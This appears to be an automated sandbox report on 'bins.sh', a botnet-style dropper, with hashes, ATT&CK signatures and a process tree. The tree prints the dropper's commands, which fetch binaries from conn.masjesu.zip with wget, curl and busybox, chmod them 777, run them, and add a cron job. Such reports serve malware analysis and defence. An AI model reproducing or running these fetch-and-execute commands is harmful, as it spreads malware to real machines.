Analysis
- max time kernel: 123s
- max time network: 153s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240418-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 09-11-2024 20:07
Static task: static1
Behavioral task: behavioral1
- Sample: bins.sh
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
- Sample: bins.sh
- Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
- Sample: bins.sh
- Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
- Sample: bins.sh
- Resource: debian9-mipsel-20240418-en
General
- Target: bins.sh
- Size: 10KB
- MD5: b1a4477e9c3d0e98d5145272953d06b5
- SHA1: 338d214d12eae1ac6ff530e04df6cb6b8497e4a8
- SHA256: 5bedea2089028be9979c0e2d54403f6440b59cbc64c081aea23c710666fac622
- SHA512: 316bb7d17076445d00b5540a1fb0f7938cf08900b7336028a537afd73068cddc86604fd4437ef96868e3821a01a7ef5d5b08431ce58f3904c3d5b8916fc25597
- SSDEEP: 192:q72+4zDnqRh1zM03C+iq2fOo4Erm2maM03C+eDnqRhjl4Erm2YiH2+h:5+zM03C+iqVo4Erm2maM03C+F4Erm2d
Malware Config
Signatures
- Contacts a large (1705) amount of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 4 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes: chmod (PID 744), chmod (PID 797), chmod (PID 905), chmod (PID 917)
- Executes dropped EXE (2 IoCs)
  Processes: /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 745), /tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 798)
- Renames itself (1 IoCs)
  Processes: EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 799)
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  IoCs: File opened for modification /var/spool/cron/crontabs/tmp.iuKPqZ (process: crontab)
- Enumerates running processes
  Discovers information about currently running processes on the system.
  Processes: EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
- System Network Configuration Discovery (1 TTPs, 15 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes: busybox (PID 743), rm (PID 747), wget (PID 922), tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 745), curl (PID 749), busybox (PID 796), wget (PID 890), busybox (PID 902), wget (PID 911), curl (PID 913), wget (PID 720), curl (PID 740), wget (PID 748), curl (PID 900), busybox (PID 915)
- Writes file to tmp directory (3 IoCs)
  Malware often drops required files in the /tmp directory.
  IoCs: File opened for modification /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (process: wget); File opened for modification /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (process: curl); File opened for modification /tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (process: curl)
Processes (nested by parent; each entry is image path, command line, PID and the signatures it triggered)
- /tmp/bins.sh: /tmp/bins.sh (PID 712)
  - /bin/rm: /bin/rm bins.sh (PID 716)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 720)
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 740)
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 743)
    Signatures: System Network Configuration Discovery
  - /bin/chmod: chmod 777 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 744)
    Signatures: File and Directory Permissions Modification
  - /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq: ./tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 745)
    Signatures: Executes dropped EXE; System Network Configuration Discovery
  - /bin/rm: rm tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 747)
    Signatures: System Network Configuration Discovery
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 748)
    Signatures: System Network Configuration Discovery
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 749)
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 796)
    Signatures: System Network Configuration Discovery
  - /bin/chmod: chmod 777 EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 797)
    Signatures: File and Directory Permissions Modification
  - /tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ: ./EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 798)
    Signatures: Executes dropped EXE; Renames itself; Reads runtime system information
    - /bin/sh: sh -c "crontab -l" (PID 800)
      - /usr/bin/crontab: crontab -l (PID 801)
    - /bin/sh: sh -c "crontab -" (PID 802)
      - /usr/bin/crontab: crontab - (PID 803)
        Signatures: Creates/modifies Cron job
  - /bin/rm: rm EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 806)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI (PID 890)
    Signatures: System Network Configuration Discovery
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI (PID 900)
    Signatures: System Network Configuration Discovery
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI (PID 902)
    Signatures: System Network Configuration Discovery
  - /bin/chmod: chmod 777 waMUu3wStjbh57023DqN3DVIdOczWDiUhI (PID 905)
    Signatures: File and Directory Permissions Modification
  - /tmp/waMUu3wStjbh57023DqN3DVIdOczWDiUhI: ./waMUu3wStjbh57023DqN3DVIdOczWDiUhI (PID 907)
  - /bin/rm: rm waMUu3wStjbh57023DqN3DVIdOczWDiUhI (PID 909)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4 (PID 911)
    Signatures: System Network Configuration Discovery
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4 (PID 913)
    Signatures: System Network Configuration Discovery
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4 (PID 915)
    Signatures: System Network Configuration Discovery
  - /bin/chmod: chmod 777 nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4 (PID 917)
    Signatures: File and Directory Permissions Modification
  - /tmp/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4: ./nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4 (PID 918)
  - /bin/rm: rm nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4 (PID 920)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/uon8OvrrB9Frxi0geNjzNpkUWmPk8Pw5uP (PID 922)
    Signatures: System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 151KB
  MD5: 6c583043d91c55aa470c08c87058e917
  SHA1: abf65a5b9bba69980278ad09356e53de8bb89439
  SHA256: 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
  SHA512: 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
- Filesize: 112KB
  MD5: 05d7857dcead18bbd86d2935f591873c
  SHA1: 34d18f41ef35f93d5364ce3e24d74730a4e91985
  SHA256: 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
  SHA512: d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
- Filesize: 210B
  MD5: 0b8fdb3b7750325facdafc1a8e8ea6b1
  SHA1: 58302cc52313b8e6f2ad9dcc8c744e744eb850dc
  SHA256: 89942faacb2ac492486e35aac40337031e9ba1f7a38013002ea1896adc5e01db
  SHA512: 5e0f4f6ee06b0d451ac2ca51863a9d791f41a355f7223a9f65185e228862d9a60d45e9a9a411aa57f6b4ce0ae11728013aa9eaad0d0c6d9502d06684bfa5e8fb